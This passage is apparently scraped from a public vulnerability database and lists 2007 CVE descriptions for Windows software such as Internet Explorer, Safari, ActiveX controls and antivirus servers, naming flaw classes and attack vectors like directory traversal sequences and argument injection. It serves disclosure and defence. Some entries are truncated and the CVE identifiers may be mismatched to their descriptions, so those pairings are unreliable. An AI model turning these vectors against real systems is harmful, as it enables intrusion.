vulnerability in a certain ActiveX control in the VB To VSI Support Library (VBTOVSI.DLL) 1.0.0.0 in Microsoft Visual Studio 6.0 allows remote attackers to create or overwrite arbitrary files via a full pathname in the argument to the SaveAs method. NOTE: contents can be copied from local files via the Load method. [CVE-2007-4848] Microsoft Internet Explorer 4.0 through 7 allows remote attackers to determine the existence of local files that have associated images via a res:// URI in the src property of a JavaScript Image object, as demonstrated by the URI for a bitmap image resource within a (1) .exe or (2) .dll file. [CVE-2007-4841] Mozilla Firefox before 2.0.0.8, Thunderbird before 2.0.0.8, and SeaMonkey before 1.1.5 allows remote attackers to execute arbitrary commands via a (1) mailto, (2) nntp, (3) news, or (4) snews URI with invalid "%" encoding, related to improper file type handling on Windows XP with Internet Explorer 7 installed, a variant of CVE-2007-3845. [CVE-2007-4814] Buffer overflow in the SQLServer ActiveX control in the Distributed Management Objects OLE DLL (sqldmo.dll) 2000.085.2004.00 in Microsoft SQL Server Enterprise Manager 8.05.2004 allows remote attackers to execute arbitrary code via a long second argument to the Start method. [CVE-2007-4790] Stack-based buffer overflow in certain ActiveX controls in (1) FPOLE.OCX 6.0.8450.0 and (2) Foxtlib.ocx, as used in the Microsoft Visual FoxPro 6.0 fpole 1.0 Type Library [CVE-2007-4776] Buffer overflow in Microsoft Visual Basic 6.0 and Enterprise Edition 6.0 SP6 allows user-assisted remote attackers to execute arbitrary code via a Visual Basic project (vbp) file containing a long Reference line, related to VBP_Open and OLE. NOTE: there are limited usage scenarios under which this would be a vulnerability. [CVE-2007-4698] Apple Safari 3 before Beta Update 3.0.4 on Windows, and Mac OS X 10.4 through 10.4.10, allows remote attackers to conduct cross-site scripting (XSS) attacks by causing JavaScript events to be associated with the wrong frame. [CVE-2007-4692] The tabbed browsing feature in Apple Safari 3 before Beta Update 3.0.4 on Windows, and Mac OS X 10.4 through 10.4.10, allows remote attackers to spoof HTTP authentication for other sites and possibly conduct phishing attacks by causing an authentication sheet to be displayed for a tab that is not active, which makes it appear as if it is associated with the active tab. [CVE-2007-4673] Argument injection vulnerability in Apple QuickTime 7.2 for Windows XP SP2 and Vista allows remote attackers to execute arbitrary commands via a URL in the qtnext field in a crafted QTL file. NOTE: this issue may be related to CVE-2006-4965 or CVE-2007-5045. [CVE-2007-4671] Unspecified vulnerability in Safari in Apple iPhone 1.1.1, and Safari 3 before Beta Update 3.0.4 on Windows and Mac OS X 10.4 through 10.4.10, allows remote attackers to "alter or access" HTTPS content via an HTTP session with a crafted web page that causes Javascript to be applied to HTTPS pages from the same domain. [CVE-2007-4599] Stack-based buffer overflow in RealNetworks RealPlayer 10 and possibly 10.5, and RealOne Player 1 and 2, for Windows allows remote attackers to execute arbitrary code via a crafted playlist (PLS) file. [CVE-2007-4578] Sophos Anti-Virus for Windows and for Unix/Linux before 2.48.0 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted UPX packed file, resulting from an "integer cast around". NOTE: as of 20070828, the vendor says this is a DoS and the researcher says this allows code execution, but the researcher is reliable. [CVE-2007-4516] The Volume Manager Scheduler Service (aka VxSchedService.exe) in Symantec Veritas Storage Foundation 5.0 for Windows allows remote attackers to cause a denial of service (daemon crash or hang) via malformed packets. [CVE-2007-4512] Cross-site scripting (XSS) vulnerability in Sophos Anti-Virus for Windows 6.x before 6.5.8 and 7.x before 7.0.1 allows remote attackers to inject arbitrary web script or HTML via an archive with a file that matches a virus signature and has a crafted filename that is not properly handled by the print function in SavMain.exe. [CVE-2007-4490] Multiple buffer overflows in EarthAgent.exe in Trend Micro ServerProtect 5.58 for Windows before Security Patch 4 allow remote attackers to have an unknown impact via certain RPC function calls to (1) RPCFN_EVENTBACK_DoHotFix or (2) CMD_CHANGE_AGENT_REGISTER_INFO. [CVE-2007-4478] Cross-site scripting (XSS) vulnerability in Microsoft Internet Explorer 6.0 and 7 allows user-assisted remote attackers to inject arbitrary web script or HTML in the local zone via a URI, when the document at the associated URL is saved to a local file, which then contains the URI string along with the document's original content. [CVE-2007-4451] The server in Toribash 2.71 and earlier on Windows allows remote attackers to cause a denial of service (continuous beep and server hang) via certain commands that contain many 0x07 or other invalid characters. [CVE-2007-4443] The UCC dedicated server for the Unreal engine, possibly 2003 and 2004, on Windows allows remote attackers to cause a denial of service (continuous beep and server slowdown) via a string containing many 0x07 characters in (1) a request to the images/ directory, (2) the Content-Type field, (3) a HEAD request, and possibly other unspecified vectors. [CVE-2007-4431] Cross-domain vulnerability in Apple Safari for Windows 3.0.3 and earlier allows remote attackers to bypass the Same Origin Policy, with access from local zones to external domains, via a certain body.innerHTML property value, aka "classic JavaScript frame hijacking." [CVE-2007-4424] Apple Safari for Windows 3.0.3 and earlier does not prompt the user before downloading a file, which allows remote attackers to download arbitrary files to the desktop of a client system via certain HTML, as demonstrated by a filename in the DATA attribute of an OBJECT element. NOTE: it could be argued that this is not a vulnerability because a dangerous file is not actually launched, but as of 2007, it is generally accepted that web browsers should prompt users before saving dangerous content. [CVE-2007-4415] Cisco VPN Client on Windows before 5.0.01.0600, and the 5.0.01.0600 InstallShield (IS) release, uses weak permissions for cvpnd.exe (Modify granted to Interactive Users), which allows local users to gain privileges via a modified cvpnd.exe. [CVE-2007-4372] Unspecified vulnerability in NetWin SurgeMail 38k on Windows Server 2003 has unknown impact and remote attack vectors. NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine. [CVE-2007-4356] Microsoft Internet Explorer 6 and 7 embeds FTP credentials in HTML files that are retrieved during an FTP session, which allows context-dependent attackers to obtain sensitive information by reading the HTML source, as demonstrated by a (1) .htm, (2) .html, or (3) .mht file. [CVE-2007-4348] Cross-site scripting (XSS) vulnerability in the CAD service in IBM Tivoli Storage Manager (TSM) Client 5.3.5.3 and 5.4.1.2 for Windows allows remote attackers to inject arbitrary web script or HTML via HTTP requests to port 1581, which generate log entries in a dsmerror.log file that is accessible through a certain web interface. [CVE-2007-4347] Multiple integer overflows in the Job Engine (bengine.exe) service in Symantec Backup Exec for Windows Servers (BEWS) 11d build 11.0.7170 and 11.0.6.6235 allow remote attackers to cause a denial of service (CPU and memory consumption) via a crafted packet to port 5633/tcp, which triggers an infinite loop. [CVE-2007-4346] The Job Engine (bengine.exe) service in Symantec Backup Exec for Windows Servers (BEWS) 11d build 11.0.7170 and 11.0.6.6235 allows remote attackers to cause a denial of service (NULL dereference and service crash) via a crafted packet to port 5633/tcp. [CVE-2007-4336] Buffer overflow in the Live Picture Corporation DXSurface.LivePicture.FlashPix.1 (DirectTransform FlashPix) ActiveX control in DXTLIPI.DLL 6.0.2.827, as packaged in Microsoft DirectX Media 6.0 SDK, allows remote attackers to execute arbitrary code via a long SourceUrl property value. [CVE-2007-4315] The AMD ATI atidsmxx.sys 3.0.502.0 driver on Windows Vista allows local users to bypass the driver signing policy, write to arbitrary kernel memory locations, and thereby gain privileges via unspecified vectors, as demonstrated by "Purple Pill". [CVE-2007-4254] Stack-based buffer overflow in a certain ActiveX control in VDT70.DLL in Microsoft Visual Database Tools Database Designer 7.0 for Microsoft Visual Studio 6 allows remote attackers to execute arbitrary code via a long argument to the NotSafe method. NOTE: this may overlap CVE-2007-2885 or CVE-2005-2127. [CVE-2007-4223] Dbgv.sys in Microsoft Sysinternals DebugView before 4.72 provides an unspecified mechanism for copying data into kernel memory, which allows local users to gain privileges via unspecified vectors. [CVE-2007-4221] Multiple buffer overflows in Motorola Timbuktu Pro before 8.6.5 for Windows allow remote attackers to cause a denial of service (daemon crash) or possibly execute arbitrary code via (1) a long user name and (2) certain malformed requests [CVE-2007-4220] Directory traversal vulnerability in Motorola Timbuktu Pro before 8.6.5 for Windows allows remote attackers to create or delete arbitrary files via a .. (dot dot) in a Send request, probably related to the (1) Send and (2) Exchange services. [CVE-2007-4219] Integer overflow in the RPCFN_SYNC_TASK function in StRpcSrv.dll, as used by the ServerProtect service (SpntSvc.exe), in Trend Micro ServerProtect for Windows before 5.58 Security Patch 4 allows remote attackers to execute arbitrary code via a certain integer field in a request packet to TCP port 5168, which triggers a heap-based buffer overflow. [CVE-2007-4218] Multiple buffer overflows in the ServerProtect service (SpntSvc.exe) in Trend Micro ServerProtect for Windows before 5.58 Security Patch 4 allow remote attackers to execute arbitrary code via certain RPC requests to certain TCP ports that are processed by the (1) RPCFN_ENG_NewManualScan, (2) RPCFN_ENG_TimedNewManualScan, and (3) RPCFN_SetComputerName functions in (a) StRpcSrv.dll [CVE-2007-4050] Unspecified vulnerability in WebUI in ADempiere Bazaar before 3.3 beta Victoria edition allows remote attackers to access system-level windows via unspecified vectors. [CVE-2007-4040] Argument injection vulnerability involving Microsoft Outlook and Outlook Express, when certain URIs are registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in an unspecified URI, which are inserted into the command line when invoking the handling process, a similar issue to CVE-2007-3670. [CVE-2007-4036] DISPUTED Guidance Software EnCase allows user-assisted remote attackers to cause a denial of service via (1) a corrupted Microsoft Exchange database, which triggers an application crash when many options are selected [CVE-2007-4025] Unspecified vulnerability in Sun Java System (SJS) Application Server 8.1 through 9.0 before 20070724 on Windows allows remote attackers to obtain JSP source code via unspecified vectors. [CVE-2007-4006] Buffer overflow in Mike Dubman Windows RSH daemon (rshd) 1.7 has unknown impact and remote attack vectors, aka ZD-00000034. NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine. [CVE-2007-4005] Stack-based buffer overflow in Mike Dubman Windows RSH daemon (rshd) 1.7 allows remote attackers to execute arbitrary code via a long string to the shell port (514/tcp). NOTE: this might overlap CVE-2007-4006. [CVE-2007-3956] TeamSpeak WebServer 2.0 for Windows does not validate parameter value lengths and does not expire TCP sessions, which allows remote attackers to cause a denial of service (CPU and memory consumption) via long username and password parameters in a request to login.tscmd on TCP port 14534. [CVE-2007-3954] Argument injection vulnerability in Microsoft Internet Explorer, when running on systems with SeaMonkey installed and certain URIs registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in a mailto URI, which are inserted into the command line that is created when invoking SeaMonkey.exe, a related issue to CVE-2007-3670. [CVE-2007-3930] Interpretation conflict between Microsoft Internet Explorer and DocuWiki before 2007-06-26b allows remote attackers to inject arbitrary JavaScript and conduct cross-site scripting (XSS) attacks when spellchecking UTF-8 encoded messages via the spell_utf8test function in lib/exe/spellcheck.php, which triggers HTML document identification and script execution by Internet Explorer even though the Content-Type header is text/plain. [CVE-2007-3924] Argument injection vulnerability in Microsoft Internet Explorer, when running on systems with Netscape installed and certain URIs registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in a -chrome argument to the navigatorurl URI, which are inserted into the command line that is created when invoking netscape.exe, a related issue to CVE-2007-3670. NOTE: there has been debate about whether the issue is in Internet Explorer or Netscape. As of 20070713, it is CVE's opinion that IE appears to not properly delimit the URL argument when invoking Netscape [CVE-2007-3903] Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code via uninitialized or deleted objects used in repeated calls to the (1) cloneNode or (2) nodeValue JavaScript function, a different issue than CVE-2007-3902 and CVE-2007-5344, a variant of "Uninitialized Memory Corruption Vulnerability." [CVE-2007-3902] Use-after-free vulnerability in the CRecalcProperty function in mshtml.dll in Microsoft Internet Explorer 5.01 through 7 allows remote attackers to execute arbitrary code by calling the setExpression method and then modifying the outerHTML property of an HTML element, one variant of "Uninitialized Memory Corruption Vulnerability." [CVE-2007-3901] Stack-based buffer overflow in the DirectShow Synchronized Accessible Media Interchange (SAMI) parser in quartz.dll for Microsoft DirectX 7.0 through 10.0 allows remote attackers to execute arbitrary code via a crafted SAMI file. [CVE-2007-3899] Unspecified vulnerability in Microsoft Word 2000 SP3, Word 2002 SP3, and Office 2004 for Mac allows user-assisted remote attackers to execute arbitrary code via a malformed string in a Word file, aka "Word Memory Corruption Vulnerability." [CVE-2007-3895] Buffer overflow in Microsoft DirectShow in Microsoft DirectX 7.0 through 10.0 allows remote attackers to execute arbitrary code via a crafted (1) WAV or (2) AVI file. [CVE-2007-3893] Unspecified vulnerability in Microsoft Internet Explorer 5.01 through 7 allows remote attackers to execute arbitrary code via unspecified vectors involving memory corruption from an unhandled error. [CVE-2007-3892] Microsoft Internet Explorer 5.01 through 7 allows remote attackers to spoof the URL address bar and other "trust UI" components via unspecified vectors, a different issue than CVE-2007-1091 and CVE-2007-3826. [CVE-2007-3891] Unspecified vulnerability in Windows Vista Weather Gadgets in Windows Vista allows remote attackers to execute arbitrary code via crafted HTML attributes. [CVE-2007-3890] Microsoft Excel in Office 2000 SP3, Office XP SP3, Office 2003 SP2, and Office 2004 for Mac allows remote attackers to execute arbitrary code via a Workspace with a certain index value that triggers memory corruption. [CVE-2007-3872] Multiple stack-based buffer overflows in the Shared Trace Service (OVTrace) service for HP OpenView Operations A.07.50 for Windows, and possibly earlier versions, allow remote attackers to execute arbitrary code via certain crafted requests. [CVE-2007-3846] Directory traversal vulnerability in Subversion before 1.4.5, as used by TortoiseSVN before 1.4.5 and possibly other products, when run on Windows-based systems, allows remote authenticated users to overwrite and create arbitrary files via a ..\ (dot dot backslash) sequence in the filename, as stored in the file repository. [CVE-2007-3815] Buffer overflow in pirs32.exe in Poslovni informator Republike Slovenije (PIRS) 2007 allows local users to cause a denial of service (application crash) and possibly execute arbitrary code via a long search string in certain fields in the GUI. NOTE: this may cross privilege boundaries if PIRS is used by data-entry workers who do not have full access to the underlying Windows environment. [CVE-2007-3793] SQL injection vulnerability in Job Management Partner 1/NETM/DM (JP1/NETM/DM) Manager on Windows before 20070413 allows remote attackers to execute arbitrary SQL commands via unspecified vectors. [CVE-2007-3760] Cross-site scripting (XSS) vulnerability in Safari in Apple iPhone 1.1.1, and Safari 3 before Beta Update 3.0.4 on Windows and Mac OS X 10.4 through 10.4.10, allows remote attackers to inject arbitrary web script or HTML via frame tags. [CVE-2007-3758] Safari in Apple iPhone 1.1.1, and Safari 3 before Beta Update 3.0.4 on Windows and in Mac OS X 10.4 through 10.4.10, allows remote attackers to set Javascript window properties for web pages that are in a different domain, which can be leveraged to conduct cross-site scripting (XSS) attacks. [CVE-2007-3756] Safari in Apple iPhone 1.1.1, and Safari 3 before Beta Update 3.0.4 on Windows and Mac OS X 10.4 through 10.4.10, allows remote attackers to obtain sensitive information via a crafted web page that identifies the URL of the parent window, even when the parent window is in a different domain. [CVE-2007-3743] Stack-based buffer overflow in bookmark handling in Apple Safari 3 Beta before Update 3.0.3 on Windows allows user-assisted remote attackers to cause a denial of service (application crash) or execute arbitrary code via a bookmark with a long title. [CVE-2007-3718] Multiple unspecified vulnerabilities in the SVG parsing engine in Apple Safari 3 Beta for Windows have unspecified remote attack vectors and impact. NOTE: this issue contains no actionable information, but it was released by a reliable researcher. [CVE-2007-3678] Stack-based buffer overflow in the MSWord text-import extension (Word 6-2000 Filter.xnt) in QuarkXPress 7.2 for Windows, when using the Rectangle Text Box tool for importing text, allows user-assisted remote attackers to execute arbitrary code via a long font name. [CVE-2007-3670] Argument injection vulnerability in Microsoft Internet Explorer, when running on systems with Firefox installed and certain URIs registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in a (1) FirefoxURL or (2) FirefoxHTML URI, which are inserted into the command line that is created when invoking firefox.exe. NOTE: it has been debated as to whether the issue is in Internet Explorer or Firefox. As of 20070711, it is CVE's opinion that IE appears to be failing to properly delimit the URL argument when invoking Firefox, and this issue could arise with other protocol handlers in IE as well. However, Mozilla has stated that it will address the issue with a "defense in depth" fix that will "prevent IE from sending Firefox malicious data." [CVE-2007-3658] Unspecified vulnerability in Microsoft Register Server (REGSVR) allows attackers to cause a denial of service via a crafted DLL library. [CVE-2007-3625] The Program Neighborhood Agent in Citrix Presentation Server Clients for 32-bit Windows before 10.100 allows remote attackers to cause a denial of service (agent exit) via a certain request that uses content redirection and a long pathname. [CVE-2007-3615] Internet Communication Manager (aka ICMAN.exe or ICM) in SAP NetWeaver Application Server 6.x and 7.x, possibly only on Windows, allows remote attackers to cause a denial of service (process crash) via a URI of a certain length that contains a sap-isc-key parameter, related to configuration of a web cache. [CVE-2007-3576] DISPUTED Microsoft Internet Explorer 6 executes web script from URIs of arbitrary scheme names ending with the "script" character sequence, using the (1) vbscript: handler for scheme names with 7 through 9 characters, and the (2) javascript: handler for scheme names with 10 or more characters, which might allow remote attackers to bypass certain XSS protection schemes. NOTE: other researchers dispute the significance of this issue, stating "this only works when typed in the address bar." [CVE-2007-3550] DISPUTED Microsoft Internet Explorer 6.0 and 7.0 allows remote attackers to fill Zones with arbitrary domains using certain metacharacters such as wildcards via JavaScript, which results in a denial of service (website suppression and resource consumption), aka "Internet Explorer Zone Domain Specification Dos and Page Suppressing". NOTE: this issue has been disputed by a third party, who states that the zone settings cannot be manipulated. [CVE-2007-3546] Cross-site scripting (XSS) vulnerability in the Windows GUI in Nessus Vulnerability Scanner before 3.0.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-3514] Cross-domain vulnerability in Apple Safari for Windows 3.0.2 allows remote attackers to bypass the Same Origin Policy and access restricted information from other domains via JavaScript that overwrites the document variable and statically sets the document.domain attribute to a file:// location, a different vector than CVE-2007-3482. [CVE-2007-3509] Heap-based buffer overflow in the RPC subsystem in Symantec Backup Exec for Windows Servers 10.0, 10d, and 11d allows remote attackers to cause a denial of service (process exit) and possibly execute arbitrary code via crafted ncacn_ip_tcp requests. [CVE-2007-3504] Directory traversal vulnerability in the PersistenceService in Sun Java Web Start in JDK and JRE 5.0 Update 11 and earlier, and Java Web Start in SDK and JRE 1.4.2_13 and earlier, for Windows allows remote attackers to perform unauthorized actions via an application that grants file overwrite privileges to itself. NOTE: this can be leveraged to execute arbitrary code by overwriting a .java.policy file. [CVE-2007-3497] Microsoft Internet Explorer 7 allows remote attackers to determine the existence of page history via the history.length JavaScript variable. [CVE-2007-3490] Unspecified vulnerability in Microsoft Excel 2003 SP2 allows remote attackers to have an unknown impact via unspecified vectors, possibly related to the sheet name, as demonstrated by 2670.xls. [CVE-2007-3482] Cross-domain vulnerability in Apple Safari for Windows 3.0.1 allows remote attackers to bypass the "same origin policy" and access restricted information from other domains via JavaScript that overwrites the document variable and statically sets the document.domain attribute. [CVE-2007-3481] DISPUTED ** Cross-domain vulnerability in Microsoft Internet Explorer 6 and 7 allows remote attackers to bypass the Same Origin Policy and access restricted information from other domains via JavaScript that overwrites the document variable and statically sets the document.domain attribute. NOTE: this issue has been disputed by other researchers, citing a variable scoping issue and information about the semantics of document.domain. [CVE-2007-3445] Buffer overflow in SJ Labs SJphone 1.60.303c, running under Windows Mobile 2003 on the Samsung SCH-i730 phone, allows remote attackers to cause a denial of service (device hang and call termination) via a malformed SIP INVITE message, a different vulnerability than CVE-2007-3351. [CVE-2007-3437] AOL Instant Messenger (AIM) 6.1.32.1 on Windows XP allows remote attackers to cause a denial of service (application crash) via a malformed header value in a SIP INVITE message, a different vulnerability than CVE-2007-3350. [CVE-2007-3376] Buffer overflow in Apple Safari 3.0.2 on Windows XP SP2 allows user-assisted remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long value in the title HTML tag, which triggers the overflow when the user adds the page as a bookmark. [CVE-2007-3362] ageet AGEphone before 1.6.2, running on Windows Mobile 5 on the HTC HyTN Pocket PC device, allows remote attackers to (1) cause a denial of service (call disruption and device hang) via a SIP message with a malformed header and (2) cause a denial of service (call disruption, false ring indication, and device outage) via a SIP message with a malformed SDP delimiter. [CVE-2007-3351] The SJPhone SIP soft phone 1.60.303c, when installed on the Dell Axim X3 running Windows Mobile 2003, allows remote attackers to cause a denial of service (device hang and traffic amplification) via a direct crafted INVITE transaction, which causes the phone to transmit many RTP packets. [CVE-2007-3350] AOL Instant Messenger (AIM) 6.1.32.1 on Windows XP allows remote attackers to cause a denial of service (application hang) via a flood of spoofed SIP INVITE requests. [CVE-2007-3341] Unspecified vulnerability in the FTP implementation in Microsoft Internet Explorer allows remote attackers to "see a valid memory address" via unspecified vectors, a different issue than CVE-2007-0217. [CVE-2007-3334] Multiple heap-based buffer overflows in the (1) Communications Server (iigcc.exe) and (2) Data Access Server (iigcd.exe) components for Ingres Database Server 3.0.3, as used in CA (Computer Associates) products including eTrust Secure Content Manager r8 on Windows, allow remote attackers to execute arbitrary code via unknown vectors. [CVE-2007-3285] Mozilla Firefox before 2.0.0.5, when run on Windows, allows remote attackers to bypass file type checks and possibly execute programs via a (1) file:/// or (2) resource: URI with a dangerous extension, followed by a NULL byte (%00) and a safer extension, which causes Firefox to treat the requested file differently than Windows would. [CVE-2007-3284] corefoundation.dll in Apple Safari 3.0.1 (552.12.2) for Windows allows remote attackers to cause a denial of service (crash) via certain forms that trigger errors related to History, possibly involving multiple form fields with the same name. [CVE-2007-3282] Buffer overflow in the Microsoft Office MSODataSourceControl ActiveX object allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long argument to the DeleteRecordSourceIfUnused method. [CVE-2007-3274] Apple Safari 3.0 and 3.0.1 on Windows XP SP2 allows attackers to cause a denial of service (application crash) via JavaScript that sets the document.location variable, as demonstrated by an empty value of document.location. [CVE-2007-3201] Visual truncation vulnerability in Windows Privacy Tray (WinPT) 1.2.0 allows user-assisted remote attackers to install a key listed under the wrong user ID, and possibly cause the user to encrypt a victim's correspondence with this attacker-supplied key, via a key ID composed of the attacker's user ID, space characters, an invalid WinPT message, additional space characters, and the victim's user ID. [CVE-2007-3187] Multiple unspecified vulnerabilities in Apple Safari for Windows allow remote attackers to cause a denial of service or execute arbitrary code, possibly involving memory corruption, and a different issue from CVE-2007-3185 and CVE-2007-3186. NOTE: as of 20070612, the original disclosure has no actionable information. However, since it is from a well-known researcher, it is being assigned a CVE identifier for tracking purposes. [CVE-2007-3186] Apple Safari Beta 3.0.1 for Windows allows remote attackers to execute arbitrary commands via shell metacharacters in a URI in the SRC of an IFRAME, as demonstrated using a gopher URI. [CVE-2007-3185] Apple Safari Beta 3.0.1 for Windows public beta allows remote attackers to cause a denial of service (crash) via unspecified DHTML manipulations that trigger memory corruption, as demonstrated using Hamachi. [CVE-2007-3180] Buffer overflow in Help and Support Center before 4.4 C on HP Windows systems allows remote attackers to read or write arbitrary files via unknown vectors. [CVE-2007-3164] Microsoft Internet Explorer 7, when prompting for HTTP Basic Authentication for an IDN web site, uses ACE labels for the domain name in the status bar, but uses internationalized labels for this name in the authentication dialog, which might allow remote attackers to perform phishing attacks if the user misinterprets confusable characters in the internationalized labels, as demonstrated by displaying xn--theshmogroup-bgk.com only in the status bar. [CVE-2007-3153] The ares_init:randomize_key function in c-ares, on platforms other than Windows, uses a weak facility for producing a random number sequence (Unix rand), which makes it easier for remote attackers to spoof DNS responses by guessing certain values. [CVE-2007-3111] Buffer overflow in the Provideo Camimage ActiveX control in ISSCamControl.dll 1.0.1.5, when Internet Explorer 6 is used on Windows 2000 SP4, allows remote attackers to execute arbitrary code via a long URL property value. [CVE-2007-3109] The CERN Image Map Dispatcher (htimage.exe) in Microsoft FrontPage allows remote attackers to determine the existence, and possibly partial contents, of arbitrary files under the web root via a relative pathname in the PATH_INFO. [CVE-2007-3092] Microsoft Internet Explorer 6 allows remote attackers to spoof the URL bar, and page properties including SSL certificates, by interrupting page loading through certain use of location DOM objects and setTimeout calls. NOTE: this issue can be leveraged for phishing and other attacks. [CVE-2007-3091] Race condition in Microsoft Internet Explorer 6 SP1 [CVE-2007-3075] Directory traversal vulnerability in Microsoft Internet Explorer allows remote attackers to read arbitrary files via directory traversal sequences in a URI with a certain scheme, possibly related to "..%5C" (encoded backslash) sequences. [CVE-2007-3072] Directory traversal vulnerability in Mozilla Firefox before 2.0.0.4 on Windows allows remote attackers to read arbitrary files via ..%5C (dot dot encoded backslash) sequences in a resource:// URI. [CVE-2007-3062] Cross-site scripting (XSS) vulnerability in HP System Management Homepage (SMH) before 2.1.2 running on Linux and Windows allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-3043] Cross-site scripting (XSS) vulnerability in Collaboration - File Sharing 01-20 up to 01-20-/B and 01-30 up to 01-30-/B in Hitachi Groupmax Collaboration Portal up to 07-30-/D, Groupmax Collaboration Web Client - Forum/File Sharing up to 07-30-/C, uCosminexus Collaboration Portal up to 06-30-/D, and uCosminexus Collaboration Portal - Forum/File Sharing up to 06-30-/C on Windows allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-3041] Unspecified vulnerability in the pdwizard.ocx ActiveX object for Internet Explorer 5.01, 6 SP1, and 7 allows remote attackers to execute arbitrary code via unknown vectors related to Microsoft Visual Basic 6 objects and memory corruption, aka "ActiveX Object Memory Corruption Vulnerability." [CVE-2007-3033] Cross-site scripting (XSS) vulnerability in Windows Vista Feed Headlines Gadget (aka Sidebar RSS Feeds Gadget) in Windows Vista allows user-assisted remote attackers to execute arbitrary code via an RSS feed with crafted HTML attributes, which are not properly removed and are rendered in the local zone. [CVE-2007-3032] Unspecified vulnerability in Windows Vista Contacts Gadget in Windows Vista allows user-assisted remote attackers to execute arbitrary code via crafted contact information that is not properly handled when it is imported. [CVE-2007-3030] Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, and 2003 Viewer allows user-assisted remote attackers to execute arbitrary code via a malformed Excel file involving the "denoting [of] the start of a Workspace designation", which results in memory corruption, aka the "Workbook Memory Corruption Vulnerability". [CVE-2007-3029] Unspecified vulnerability in Microsoft Excel 2002 SP3 and 2003 SP2 allows user-assisted remote attackers to execute arbitrary code via a malformed Excel file containing multiple active worksheets, which results in memory corruption. [CVE-2007-3027] Race condition in Microsoft Internet Explorer 5.01, 6, and 7 allows remote attackers to execute arbitrary code by causing Internet Explorer to install multiple language packs in a way that triggers memory corruption, aka "Language Pack Installation Vulnerability." [CVE-2007-2954] Multiple stack-based buffer overflows in the Spooler service (nwspool.dll) in Novell Client 4.91 SP2 through SP4 for Windows allow remote attackers to execute arbitrary code via certain long arguments to the (1) RpcAddPrinterDriver, (2) RpcGetPrinterDriverDirectory, and other unspecified RPC requests, aka Novell bug 300870, a different vulnerability than CVE-2006-5854. [CVE-2007-2931] Heap-based buffer overflow in Microsoft MSN Messenger 6.2, 7.0, and 7.5, and Live Messenger 8.0 allows user-assisted remote attackers to execute arbitrary code via unspecified vectors involving video conversation handling in Web Cam and video chat sessions. [CVE-2007-2927] Unspecified vulnerability in Atheros 802.11 a/b/g wireless adapter drivers before 5.3.0.35, and 6.x before 6.0.3.67, on Windows allows remote attackers to cause a denial of service via a crafted 802.11 management frame. [CVE-2007-2903] Buffer overflow in the HelpPopup method in the Microsoft Office 2000 Controllo UA di Microsoft Office ActiveX control (OUACTRL.OCX) 1.0.1.9 allows remote attackers to cause a denial of service (probably winhlp32.exe crash) via a long first argument. NOTE: it is not clear whether this issue crosses privilege boundaries. [CVE-2007-2897] Microsoft Internet Information Services (IIS) 6.0 allows remote attackers to cause a denial of service (server instability or device hang), and possibly obtain sensitive information (device communication traffic) [CVE-2007-2896] Race condition in the Symantec Enterprise Security Manager (ESM) 6.5.3 managers and agents on Windows before 20070524 allows remote attackers to cause a denial of service (CPU consumption and application hang) via certain network scans to ESM ports. [CVE-2007-2885] The NotSafe function in the MSVDTDatabaseDesigner7 ActiveX control in VDT70.DLL in Microsoft Visual Database Tools (MSVDT) Database Designer 7.0 allows remote attackers to cause a denial of service (Internet Explorer 6 crash) via a long argument. [CVE-2007-2884] Multiple stack-based buffer overflows in Microsoft Visual Basic 6 allow user-assisted remote attackers to cause a denial of service (CPU consumption) or execute arbitrary code via a Visual Basic Project (vbp) file with a long (1) Description or (2) Company Name (VersionCompanyName) field. [CVE-2007-2883] Credant Mobile Guardian Shield for Windows 5.2.1.105 and earlier stores account names and passwords in plaintext in memory, which allows local users to obtain sensitive information by (1) reading the paging file or (2) dumping and searching the memory image. NOTE: This issue crosses privilege boundaries because the product is intended to protect the data on a stolen computer. [CVE-2007-2809] Buffer overflow in the transfer manager in Opera before 9.21 for Windows allows user-assisted remote attackers to execute arbitrary code via a crafted torrent file. NOTE: due to the lack of details, it is not clear if this is the same issue as CVE-2007-2274. [CVE-2007-2718] Cross-site scripting (XSS) vulnerability in the WebMail system in Stalker CommuniGate Pro 5.1.8 and earlier, when using Microsoft Internet Explorer, allows remote attackers to inject arbitrary web script or HTML via crafted STYLE tags. [CVE-2007-2528] Buffer overflow in AgRpcCln.dll for Trend Micro ServerProtect 5.58 for Windows before Security Patch 3 Build 1176 allows remote attackers to execute arbitrary code via unknown vectors related to RPC requests. NOTE: this is probably a different vulnerability than CVE-2007-2508. [CVE-2007-2441] Caucho Resin Professional 3.1.0 and Caucho Resin 3.1.0 and earlier for Windows allows remote attackers to obtain the system path via certain URLs associated with (1) deploying web applications or (2) displaying .xtp files. [CVE-2007-2440] Directory traversal vulnerability in Caucho Resin Professional 3.1.0 and Caucho Resin 3.1.0 and earlier for Windows allows remote attackers to read certain files via a .. (dot dot) in a URI containing a "\web-inf" sequence. [CVE-2007-2439] Caucho Resin Professional 3.1.0 and Caucho Resin 3.1.0 and earlier for Windows allows remote attackers to cause a denial of service (device hang) and read data from a COM or LPT device via a DOS device name with an arbitrary extension. [CVE-2007-2407] The Samba server on Apple Mac OS X 10.3.9 and 10.4.10, when Windows file sharing is enabled, does not enforce disk quotas after dropping privileges, which allows remote authenticated users to use disk space in excess of quota. [CVE-2007-2400] Race condition in Apple Safari 3 Beta before 3.0.2 on Mac OS X, Windows XP, Windows Vista, and iPhone before 1.0.1, allows remote attackers to bypass the JavaScript security model and modify pages outside of the security domain and conduct cross-site scripting (XSS) attacks via vectors related to page updating and HTTP redirects. [CVE-2007-2398] 